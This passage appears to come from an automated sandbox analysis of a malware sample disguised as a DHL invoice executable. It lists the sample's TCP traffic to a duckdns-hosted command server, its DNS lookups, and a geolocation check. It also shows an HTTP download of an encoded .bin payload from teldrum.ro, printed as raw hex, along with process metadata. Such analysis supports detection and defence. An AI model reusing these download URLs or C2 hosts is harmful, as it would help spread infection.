                                                                                                                                                                                                                                    Jan 9, 2025 08:38:33.556991100 CET39814983743.226.229.205192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:33.557125092 CET498373981192.168.11.3043.226.229.205
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:33.585645914 CET498383981192.168.11.3043.226.229.205
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:33.585671902 CET498383981192.168.11.3043.226.229.205
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:33.585743904 CET498383981192.168.11.3043.226.229.205
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:34.105496883 CET39814983843.226.229.205192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:34.132250071 CET39814983843.226.229.205192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:34.132272959 CET39814983843.226.229.205192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:34.132447004 CET498383981192.168.11.3043.226.229.205
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:34.132492065 CET498383981192.168.11.3043.226.229.205
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:34.132539988 CET498383981192.168.11.3043.226.229.205
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:34.132638931 CET39814983843.226.229.205192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:34.132884026 CET498383981192.168.11.3043.226.229.205
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:34.132898092 CET39814983843.226.229.205192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:34.133049011 CET498383981192.168.11.3043.226.229.205
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:34.133095026 CET498383981192.168.11.3043.226.229.205
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:34.144457102 CET39814983743.226.229.205192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:34.409447908 CET498373981192.168.11.3043.226.229.205
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:34.678803921 CET39814983843.226.229.205192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:34.678951979 CET39814983843.226.229.205192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:34.679759026 CET39814983843.226.229.205192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:34.680244923 CET39814983843.226.229.205192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:34.680344105 CET39814983843.226.229.205192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:34.680612087 CET39814983843.226.229.205192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:34.765631914 CET498383981192.168.11.3043.226.229.205
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:34.765675068 CET498383981192.168.11.3043.226.229.205
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:34.765723944 CET498383981192.168.11.3043.226.229.205
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:34.765892029 CET498383981192.168.11.3043.226.229.205
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:34.766063929 CET498383981192.168.11.3043.226.229.205
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:34.766963005 CET498383981192.168.11.3043.226.229.205
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:34.767050028 CET498383981192.168.11.3043.226.229.205
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:34.767131090 CET498383981192.168.11.3043.226.229.205
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:34.767477036 CET498383981192.168.11.3043.226.229.205
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:34.957937002 CET39814983843.226.229.205192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:34.996012926 CET39814983743.226.229.205192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:35.001986980 CET498383981192.168.11.3043.226.229.205
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:35.172070026 CET39814983343.226.229.205192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:35.220683098 CET498333981192.168.11.3043.226.229.205
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:35.312066078 CET39814983843.226.229.205192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:35.312478065 CET39814983843.226.229.205192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:35.312938929 CET39814983843.226.229.205192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:35.313195944 CET39814983843.226.229.205192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:35.313683033 CET39814983843.226.229.205192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:35.314541101 CET39814983843.226.229.205192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:35.314555883 CET39814983843.226.229.205192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:35.314565897 CET39814983843.226.229.205192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:35.314574957 CET39814983843.226.229.205192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:35.314585924 CET39814983843.226.229.205192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:35.314595938 CET39814983843.226.229.205192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:35.314675093 CET39814983843.226.229.205192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:35.315843105 CET39814983843.226.229.205192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:39.967123032 CET4983680192.168.11.30178.237.33.50
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:39.967170000 CET498373981192.168.11.3043.226.229.205
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:39.967180014 CET498333981192.168.11.3043.226.229.205
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:39.967210054 CET498383981192.168.11.3043.226.229.205
                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:08.450978994 CET5809153192.168.11.301.1.1.1
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:08.942913055 CET53580911.1.1.1192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:17.629440069 CET5516453192.168.11.301.1.1.1
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:17.775130987 CET53551641.1.1.1192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:21.195504904 CET5073553192.168.11.301.1.1.1
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:21.316334963 CET53507351.1.1.1192.168.11.30
                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:08.450978994 CET192.168.11.301.1.1.10x73c8Standard query (0)teldrum.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:17.629440069 CET192.168.11.301.1.1.10x85d8Standard query (0)wealthabundance01.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:21.195504904 CET192.168.11.301.1.1.10xef81Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:08.942913055 CET1.1.1.1192.168.11.300x73c8No error (0)teldrum.ro109.99.162.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:17.775130987 CET1.1.1.1192.168.11.300x85d8No error (0)wealthabundance01.duckdns.org43.226.229.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:21.316334963 CET1.1.1.1192.168.11.300xef81No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    • teldrum.ro
                                                                                                                                                                                                                                    • geoplugin.net
                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    0192.168.11.3049836178.237.33.50809056C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:21.531414032 CET71OUTGET /json.gp HTTP/1.1
                                                                                                                                                                                                                                    Host: geoplugin.net
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:21.750610113 CET1171INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    date: Thu, 09 Jan 2025 07:38:21 GMT
                                                                                                                                                                                                                                    server: Apache
                                                                                                                                                                                                                                    content-length: 963
                                                                                                                                                                                                                                    content-type: application/json; charset=utf-8
                                                                                                                                                                                                                                    cache-control: public, max-age=300
                                                                                                                                                                                                                                    access-control-allow-origin: *
                                                                                                                                                                                                                                    Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 38 35 2e 32 34 36 2e 32 30 39 2e 31 35 34 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 43 68 69 63 61 67 6f 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 49 6c 6c 69 6e 6f 69 73 22 2c 0a 20 20 22 [TRUNCATED]
                                                                                                                                                                                                                                    Data Ascii: { "geoplugin_request":"185.246.209.154", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Chicago", "geoplugin_region":"Illinois", "geoplugin_regionCode":"IL", "geoplugin_regionName":"Illinois", "geoplugin_areaCode":"", "geoplugin_dmaCode":"602", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"41.871", "geoplugin_longitude":"-87.6289", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Chicago", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    0192.168.11.3049832109.99.162.144439056C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2025-01-09 07:38:09 UTC183OUTGET /pefNPfIwXuOzWmfkZMUhyE10.bin HTTP/1.1
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                    Host: teldrum.ro
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    2025-01-09 07:38:10 UTC223INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Date: Thu, 09 Jan 2025 07:38:09 GMT
                                                                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                                                                    Last-Modified: Tue, 07 Jan 2025 05:01:32 GMT
                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                    Content-Length: 493120
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                                    2025-01-09 07:38:10 UTC7969INData Raw: 7d 12 5e 6b d3 15 0b a6 92 e3 ae 97 5c 32 8e 47 5b ac 74 46 ef 76 d5 e8 fd a6 d2 5e 96 4f 7a 8f 41 5c 06 5e 77 81 1f e9 08 7c 14 b2 49 38 3c 81 0d 81 f4 79 b2 9f 51 5e 9f 7c b8 fc cd 6b 6a 92 a9 e2 ef c2 4c 8a 80 a1 ac 59 db ad 96 b3 01 22 fc c8 e9 e1 41 63 d5 d3 a4 20 bc 1d ea 5d 20 d3 4d dc 3d 89 57 f9 1d cf 46 4d c1 8a a6 c2 f2 6c 9e 01 b4 39 0f f7 68 76 73 ca ce d4 65 d1 96 7e 24 26 6b 28 62 85 de de 6a 0b 15 4a 8c 64 c0 ed bf 62 e4 c2 e4 19 a4 bc 96 c5 9a 57 49 b4 bf cc 76 40 6b a1 6a b2 68 3f aa 00 80 e1 6f be 4b c3 ce c1 bc 1c 09 88 13 c6 88 f2 f3 47 ea 89 75 1d 6f 07 66 05 45 77 90 d6 c7 e9 e1 cf 8f 8b 2f 86 93 21 9c ce 53 e1 e7 8d c9 64 27 d1 2e 6b 25 25 29 2d 47 33 98 29 cd 77 93 73 81 11 cf ee 78 f6 83 27 de 7b 42 b0 a6 d0 15 c2 17 a2 2e b4 b0
                                                                                                                                                                                                                                    Data Ascii: }^k\2G[tFv^OzA\^w|I8<yQ^|kjLY"Ac ] M=WFMl9hvse~$&k(bjJdbWIv@kjh?oKGuofEw/!Sd'.k%%)-G3)wsx'{B.
                                                                                                                                                                                                                                    2025-01-09 07:38:10 UTC8000INData Raw: 7d 01 74 29 b1 36 1c 45 80 a2 27 21 ab cf 8e a1 2a 0c 5f 3c 47 df 79 70 40 e7 8a 80 a1 23 1a cf fa e4 70 0f ab 00 ec f9 b6 ca ae 3d c7 e7 20 bc 96 27 d6 d0 3b 80 29 c2 76 da b7 1c 46 02 69 d9 db 2d 0a 1a 9d 64 fe 4b b0 4b d3 48 ff 08 da 47 a7 79 2f e2 5a 0a d1 43 cc 9d ce 54 6f 6f a7 04 8d b9 1c 6b f1 f2 3d 3b c6 b2 5a 3c ba d3 b4 c8 1c a3 e9 87 4b 76 8a f6 3b 13 90 4a b9 eb 90 11 3e a0 b5 3c f3 28 e2 fc 61 67 d5 48 24 10 08 0c b8 61 cd 51 3d 1a 2d 3a 81 ae 68 a1 63 86 5e c7 b5 73 e7 d6 21 cc 1d f6 d3 07 56 67 2a 3a c4 29 06 d5 36 fc d2 25 7a a8 c8 61 3f 9f 45 7f 18 5f 22 7a 64 b1 01 4d 50 c0 8c f8 34 29 d8 8b c6 db bc b0 16 96 b2 d6 8c f4 3b 21 08 38 08 8b 2a 11 7e 99 a2 5d f1 4e 41 dc 0c b6 7a 6c 59 21 c3 26 88 9b f5 95 83 77 3b 76 72 6b b4 0a 2c e5 3d
                                                                                                                                                                                                                                    Data Ascii: }t)6E'!*_<Gyp@#p= ';)vFi-dKKHGy/ZCTook=;Z<Kv;J><(agH$aQ=-:hc^s!Vg*:)6%za?E_"zdMP4);!8*~]NAzlY!&w;vrk,=
                                                                                                                                                                                                                                    2025-01-09 07:38:10 UTC8000INData Raw: 86 34 77 73 49 0a e4 e0 9c b2 5e c2 80 05 d9 9d f7 d2 37 0d f4 14 06 78 78 88 c3 91 11 b0 fc 16 4b e6 88 b0 a8 ba 40 6d 57 95 87 12 30 f6 d1 96 b2 58 51 09 85 f6 4c 67 d5 20 68 74 25 2c 91 d5 e7 1f cc fc 79 26 cc 24 61 45 1f 93 2e 52 4d e9 b4 85 49 2b f5 7e 38 df 2a 22 8e 60 1d a0 65 f9 a9 bd be f5 3d 41 02 1d cb a0 06 da 06 ef e1 1e 27 53 80 22 f3 dd 20 73 83 e7 46 a5 ce 49 b1 e4 be 38 27 14 e0 f9 94 f7 a2 34 ce ed d4 12 2f aa ae d9 fd e3 c9 a4 81 12 74 d3 0e ae 45 55 71 ce 3a 0b 05 8e 0b 73 64 df b3 95 19 e9 bf 61 b5 ef 58 12 fe ea d0 56 1b 24 bc 68 55 7e e7 91 cf d5 5c ea 32 1b 24 f7 92 f0 27 7a 30 4f 09 fe 3d 2e 06 9a 66 ff 17 a9 2c 23 09 fc b8 51 63 55 5e 63 4b c8 e2 9b cf da f5 a4 b7 34 28 41 6d 0e 9d 78 ff 7b 33 bf b9 0c 9c b9 45 81 c0 ba bb 50 fb
                                                                                                                                                                                                                                    Data Ascii: 4wsI^7xxK@mW0XQLg ht%,y&$aE.RMI+~8*"`e=A'S" sFI8'4/tEUq:sdaXV$hU~\2$'z0O=.f,#QcU^cK4(Amx{3EP
                                                                                                                                                                                                                                    2025-01-09 07:38:10 UTC8000INData Raw: 44 d5 2e 68 59 bf 78 49 c9 5e 14 c7 c7 bc 13 1e 11 21 f5 b4 60 a1 a6 88 ba 06 e1 80 22 19 9a 04 90 62 f9 3c ac 3a 38 52 80 ca 43 69 19 89 2d 71 e9 84 74 c0 8c f7 4e bf a4 3b ee 08 05 c0 f8 30 0b 29 41 28 69 ed f8 ba ee d7 48 07 0a b6 c1 1d cd 8a 4d 0c 0b 5e 79 be de 50 4c f7 0b 67 ad c3 a6 15 2f c0 1c 5f 4b 87 30 8e ef 16 a6 ec 4a 82 d2 c0 08 e3 62 97 8e 9e 9a cf b0 2f de c6 75 2a e3 db ee 66 a0 ac 13 17 dc 21 27 77 3d 2f f6 e9 5c 2b 71 02 63 f4 a4 e7 c0 64 b2 a2 de a7 b7 34 4b 99 e0 5e 65 f5 cf 8b 08 8b aa 7c eb 79 e4 95 3b cf c4 e3 09 b0 44 ba 67 eb bf 1a fd aa 1f 8f cc 5d a4 01 7f 07 44 f3 88 20 12 6a bf 9f a4 51 cb 13 ab 8f be 54 eb a6 e3 d7 55 12 4e f0 68 4b 26 7a a0 c7 c6 b5 f8 fa 3d 5c c1 d6 f3 4d 71 16 43 6f bb c6 cc 21 f0 77 97 b3 03 06 d5 ef 56
                                                                                                                                                                                                                                    Data Ascii: D.hYxI^!`"b<:8RCi-qtN;0)A(iHM^yPLg/_K0Jb/u*f!'w=/\+qcd4K^e|y;Dg]D jQTUNhK&z=\MqCo!wV
                                                                                                                                                                                                                                    2025-01-09 07:38:10 UTC8000INData Raw: f1 f9 d1 8e 31 de 8d 75 ce 91 18 b7 e7 ba df 15 c7 7d 03 8a 93 ae f3 70 ff 5e 89 ef 58 1a 26 73 ee cd a7 8a a2 18 2d 55 93 b6 ac aa 8c 98 22 11 94 e3 b5 d8 b2 b3 9f e0 dd 2d 66 a4 42 95 1b 2d 77 20 6a cc b5 fd d7 ee 71 d8 4a 9d 3d fa a2 70 8d de a9 44 48 34 d5 e8 19 eb 8d ed 2d 84 7c 33 1c 0f 27 3d 3f 5f 95 31 f8 f4 d4 72 e5 8c 2d 47 9c 0a 74 d1 f9 de a5 89 a5 b5 98 45 44 5e 04 df ed 2a 95 53 08 f7 bf 14 0d 04 ee 78 4c a9 7f 92 81 9f 99 22 0b e2 ba cc 20 b3 f7 04 2a 1b 2a 90 b5 7f 1c 4d fd da 51 e4 f7 e2 89 38 fe e3 7b 69 a4 ad 0e 6c 67 88 4d c5 99 10 59 38 9b 5e 09 63 bc 76 ce 2b a8 53 86 cb 32 a6 47 48 6e 19 75 39 af e8 b7 be 12 e1 be 12 a7 58 f4 01 e2 52 6b 0e 56 7c 26 9c 7b 8c b4 a3 4f 13 e7 08 a4 4e db ca a5 d2 85 c4 1c 91 b1 23 ea 9a fe 47 a2 48 9c
                                                                                                                                                                                                                                    Data Ascii: 1u}p^X&s-U"-fB-w jqJ=pDH4-|3'=?_1r-GtED^*SxL" **MQ8{ilgMY8^cv+S2GHnu9XRkV|&{ON#GH
                                                                                                                                                                                                                                    2025-01-09 07:38:10 UTC8000INData Raw: 71 9c 37 98 86 d4 db dd 85 d3 77 94 00 ec 51 4e ee e6 39 97 9b e8 d9 ff f9 f9 65 0a c4 ce 40 9f a1 a3 18 cc 5c 58 fe 1a 89 8f be da 9b 75 b2 93 cb aa 53 71 64 38 9f fc 01 fc dc 0f c3 e9 55 fb 11 92 88 18 0b b6 9d 60 fc 41 d0 0e 24 a1 53 cf e4 45 f1 80 95 4b 61 f7 1c 39 3a 12 5d e4 77 ae c1 2c e8 b5 7b af 4f ad 0e 0f 64 52 5d 4c 19 3f 49 ad 8a ff 1d 1c 3d c3 43 1a 9c c0 e8 98 ae cd 34 81 6e 55 b5 b5 9e cc 10 70 21 f3 40 06 26 ae 38 01 e2 10 6d 06 86 13 61 60 f9 d6 e3 c6 b7 41 93 0e 38 3a 8a 32 d3 12 45 3d 54 ff 32 2a c2 d7 7d ee 24 90 32 1f cc fe 41 97 38 69 bc 15 2a 5f 66 09 33 18 38 6f 04 c5 f8 62 91 35 1f fe 70 a9 68 77 fa 14 ee fd eb 9c cb fc 79 1d c6 4d 00 de 98 0b de 66 f1 c2 29 99 65 df 24 52 8e 52 7e da a1 f0 28 9c a3 f1 84 13 90 23 f5 72 9c b3 6a
                                                                                                                                                                                                                                    Data Ascii: q7wQN9e@\XuSqd8U`A$SEKa9:]w,{OdR]L?I=C4nUp!@&8ma`A8:2E=T2*}$2A8i*_f38ob5phwyMf)e$RR~(#rj
                                                                                                                                                                                                                                    2025-01-09 07:38:10 UTC8000INData Raw: d0 1d 33 a1 53 15 83 8d f7 01 62 4b e1 f5 1c 39 e0 73 08 d7 53 1f c3 87 51 38 de 63 d0 83 a7 18 dc 21 10 a4 72 f3 2e 94 33 de 85 ff 05 89 2b f3 ef 05 d6 15 57 86 34 48 6e a8 c4 b5 24 33 c3 db a4 7b bc 12 db cc 90 ee df 9f ae de 80 a7 1d 73 46 68 7d 38 0d 4e 93 27 e5 48 ef 11 5e a8 ad fb 70 08 77 6b 15 41 f0 cb 70 23 a5 7f 63 8c 55 dc 00 d9 f9 ad c2 33 8c 26 41 0c b0 0a 6d ad ef a2 ae 9a 6d 3e 35 f9 e3 65 53 14 9c 3d 7e a4 75 d6 d0 1d b4 8d 4d 46 29 81 de 71 28 d9 de 8e c3 28 83 52 fc a9 d3 f7 f7 0f d7 41 c6 73 84 ee 6f 92 c4 93 2e b0 89 ee 8e 04 1f 5e 6a f3 77 97 bd b9 17 7e 7a 22 1d b3 b3 b7 40 e7 5a cd 09 cb 69 e2 46 ee e2 61 f8 f8 ba 4b e8 07 04 be 77 87 23 86 e2 6b 0c 32 83 a4 fb 02 f3 ea 70 fa 44 5f b2 ee e7 7f b3 bb f3 48 87 f0 5f 7f 97 85 a5 7c a8
                                                                                                                                                                                                                                    Data Ascii: 3SbK9sSQ8c!r.3+W4Hn$3{sFh}8N'H^pwkAp#cU3&Amm>5eS=~uMF)q((RAso.^jw~z"@ZiFaKw#k2pD_H_|
                                                                                                                                                                                                                                    2025-01-09 07:38:10 UTC8000INData Raw: 25 83 e5 95 a2 8c b9 03 70 6b 1a 98 28 f7 68 af 9f 11 b4 fb 37 f5 11 3b dd b9 72 c0 2b ec a3 46 31 e3 17 82 5c 3d 8a 3c b4 1d 2a 06 12 cc 7e 25 a5 87 ad 00 fb 16 06 35 7a 7b 40 be f4 89 c3 b5 aa 73 b2 98 15 8a 86 e2 1e 56 97 bd 2f 96 d6 a1 83 70 c9 c2 84 a5 db c7 03 3c 39 1c 54 ca 6f cc b4 26 bf 61 d5 7a 71 35 54 b9 ee 7a 0a 43 1f d3 aa 9f bb 07 06 46 e8 ee 73 4b dd 5a af e1 93 1a 0a 40 14 75 7e f3 d1 61 58 ea 85 f1 d3 c3 ea f1 ec e9 77 87 c9 c5 44 a5 c4 5f d5 46 7f aa ab b3 f4 87 60 11 a3 56 6a a2 d1 3f 7f 05 27 f0 82 db 5b c4 b2 ab ac 2a 3e 8e d6 8a 68 41 d5 9b 89 b5 1a da 23 d1 8d cd be e8 4c d3 c4 ee b4 0c 98 c6 35 8b bf 33 bb 8b 88 e3 30 f3 c2 26 d6 90 22 90 5f bc f0 52 70 e8 40 57 c4 5e 94 d6 77 e9 1e ca 84 c7 c5 70 f2 36 2c 75 29 48 f1 d9 62 9b b1
                                                                                                                                                                                                                                    Data Ascii: %pk(h7;r+F1\=<*~%5z{@sV/p<9To&azq5TzCFsKZ@u~aXwD_F`Vj?'[*>hA#L530&"_Rp@W^wp6,u)Hb
                                                                                                                                                                                                                                    2025-01-09 07:38:10 UTC8000INData Raw: e3 e7 5d bc e2 70 88 70 de 8e c3 e7 24 5a d9 55 fa 9d 63 33 a5 c8 5a f0 40 db e3 71 90 c8 2e 5a 35 8e af 42 2c 13 e4 28 5f 27 c4 17 b9 7a 7c 33 99 4f 2c 85 9b 0c 0a 15 12 a8 82 6d ef 9a 76 ee 5f fc bb 87 fb c2 25 b6 96 00 c8 8e f3 c4 4d ae 31 5d 9d 39 e2 b5 fb b9 99 76 e5 56 e4 de 76 c4 7a 05 52 9b 84 d3 5b cc d1 f3 c0 50 37 7b 22 51 73 74 5e 9c 8b fd 15 9c 33 39 e3 04 7b be 13 9a 47 7f bb ec c0 42 f5 84 d3 af 7d 8b 88 e3 a3 81 ad e2 bc 90 ff 95 3c 74 19 70 2a ba 15 54 88 13 c3 de 77 b3 39 e9 81 2f a9 02 81 ed 8d b4 5d 17 5e ff be 3b 7a 99 3f 93 45 14 5f 48 58 b4 00 72 c2 ef 47 41 15 0b 4f 8d 5e 34 95 9d 97 7f b1 7e b3 b4 70 ab d1 76 fe 64 a7 b2 ff 14 7d ba 31 e9 0a 28 aa 96 db 9c 0c d5 0a 35 a6 b6 79 80 c8 4e 17 56 17 22 d2 13 37 6c 8d 3f 24 7a f1 d8 4c
                                                                                                                                                                                                                                    Data Ascii: ]pp$ZUc3Z@q.Z5B,(_'z|3O,mv_%M1]9vVvzR[P7{"Qst^39{GB}<tp*Tw9/]^;z?E_HXrGAO^4~pvd}1(5yNV"7l?$zL
                                                                                                                                                                                                                                    2025-01-09 07:38:10 UTC8000INData Raw: 8a 80 71 18 94 25 60 45 76 47 5e e3 9e 3a cf 03 ed a9 92 da 0a ae 26 75 62 a0 f0 e2 83 5b aa 7c ed 85 b1 40 5a 2b f6 1e a0 9f 51 f8 b4 5f 11 f9 2a c4 eb 63 af e4 f8 6b 3c 28 d4 91 62 06 12 d1 ba ce 70 68 a0 d7 ae 77 be 89 af 1e 7b bb 07 d9 89 ee ea ca c5 ca 6b c3 90 0d 7f be 00 07 b0 cc f3 57 f0 24 a4 cd 59 77 75 4f 2d a5 6d 04 30 08 a0 3d 5b 3c 11 29 77 fa b8 ed 7c 74 00 69 24 e1 b1 ae 2d 08 30 03 81 b5 76 19 2a c9 25 8f f4 ac aa 2a c1 b1 23 eb 81 6e 35 82 a1 a6 ff d5 ce e9 3f 57 31 a1 67 82 d0 33 6b 0e f2 1c d6 a1 ce f8 13 b4 7d fc 5c 40 0b 65 95 87 64 3f 09 59 e8 22 74 11 0a 87 7b 85 96 e5 51 53 7a 9d 2d 9c 78 d9 45 77 dc cb 5f ec a7 58 21 77 c7 6b a2 53 b9 ee 35 b5 ce 6a 25 61 cf 46 75 90 2c ab f9 bf de dd 5f b7 ab d9 fc 69 dd 46 2f e1 79 b9 4d da f9
                                                                                                                                                                                                                                    Data Ascii: q%`EvG^:&ub[|@Z+Q_*ck<(bphw{kW$YwuO-m0=[<)w|ti$-0v*%*#n5?W1g3k}\@ed?Y"t{QSz-xEw_X!wkS5j%aFu,_iF/yM


                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                    Target ID:2
                                                                                                                                                                                                                                    Start time:02:37:37
                                                                                                                                                                                                                                    Start date:09/01/2025
                                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe"
                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                    File size:764'339 bytes
                                                                                                                                                                                                                                    MD5 hash:A25712989100FCDCB627446BCEDB6C0A
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:4
                                                                                                                                                                                                                                    Start time:02:37:57
                                                                                                                                                                                                                                    Start date:09/01/2025
                                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe
